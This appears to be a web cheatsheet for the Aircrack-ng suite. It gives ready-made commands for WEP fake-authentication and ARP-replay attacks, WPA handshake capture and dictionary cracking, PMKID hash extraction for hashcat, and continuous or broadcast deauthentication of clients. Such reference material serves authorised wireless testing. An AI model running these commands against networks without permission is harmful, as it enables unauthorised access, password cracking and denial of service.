Aircrack-ng Cheatsheet
Table of Contents
- Basic Commands
- Network Discovery
- Packet Capture
- WEP Attacks
- WPA/WPA2 Attacks
- Client Attacks
- Advanced Operations
Basic Commands
-
Interface Management
Terminal window airmon-ng # Show wireless interfacesairmon-ng check # Check for interfering processesairmon-ng check kill # Kill interfering processesairmon-ng start wlan0 # Start monitor modeairmon-ng stop wlan0mon # Stop monitor mode -
Basic Network Analysis
Terminal window airodump-ng wlan0mon # Start scanning networksaireplay-ng --test wlan0mon # Test injection capabilities
Network Discovery
airodump-ng wlan0monairodump-ng --band abg wlan0mon # Scan all bandsairodump-ng --channel 6 wlan0mon # Scan specific channelairodump-ng --bssid [MAC] --channel [CH] --write capture wlan0monairodump-ng --essid [NAME] --write capture wlan0monPacket Capture
airodump-ng --bssid [MAC] -w output wlan0mon # Basic captureairodump-ng --bssid [MAC] -c [CH] -w output --output-format pcap wlan0mon # Full captureairdecap-ng -b [MAC] output.cap # Decrypt captured packetsWEP Attacks
-
Fake Authentication
Terminal window aireplay-ng -1 0 -e [ESSID] -a [MAC] -h [YOUR_MAC] wlan0mon -
ARP Replay Attack
Terminal window aireplay-ng -3 -b [MAC] -h [YOUR_MAC] wlan0mon -
Cracking
Terminal window aircrack-ng -b [MAC] output*.capaircrack-ng -K -b [MAC] output*.cap # PTW attack
WPA/WPA2 Attacks
# Capture handshakeairodump-ng --bssid [MAC] -c [CH] -w wpa wlan0mon# Deauthentication to force handshakeaireplay-ng -0 1 -a [MAC] -c [CLIENT_MAC] wlan0mon# Dictionary attackaircrack-ng -w wordlist.txt wpa*.cap# Using hashcat formataircrack-ng -J output wpa*.cap# Cracking with rulesaircrack-ng -r rules.txt -w wordlist.txt wpa*.capClient Attacks
# Deauthentication attackaireplay-ng -0 0 -a [MAC] wlan0mon # Continuous deauthaireplay-ng -0 10 -a [MAC] wlan0mon # Send 10 deauth packetsaireplay-ng -0 0 -a [MAC] -c FF:FF:FF:FF:FF:FF wlan0mon # Broadcast deauthAdvanced Operations
aireplay-ng -5 -b [MAC] -h [YOUR_MAC] wlan0monpacketforge-ng -0 -a [MAC] -h [YOUR_MAC] -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w inject.caphcxdumptool -i wlan0mon -o pmkid.pcapng --enable_statushcxpcaptool -z pmkid.hash pmkid.pcapnghashcat -m 16800 pmkid.hash wordlist.txtBest Practices
- Always operate on networks you own or have permission to test
- Keep your Aircrack-ng suite updated
- Use strong wireless adapters with good injection capabilities
- Monitor system logs for errors
- Save captures for analysis
- Use appropriate gain and TX power settings
Common Workflows
-
Basic Network Assessment
- Start monitor mode
- Scan for networks
- Identify target network
- Capture required packets
- Analyze collected data
-
Troubleshooting
- Check for interfering processes
- Verify driver compatibility
- Test injection capabilities
- Monitor packet capture quality
- Verify hardware functionality
Tips and Tricks
- Use external antennas for better range
- Position yourself closer to the target network
- Avoid running other network-intensive applications
- Keep captures organized with meaningful names
- Use screen or tmux for managing multiple terminals
- Monitor system temperature during intensive operations
Note: This tool should only be used for legitimate network testing and security assessment purposes with proper authorization.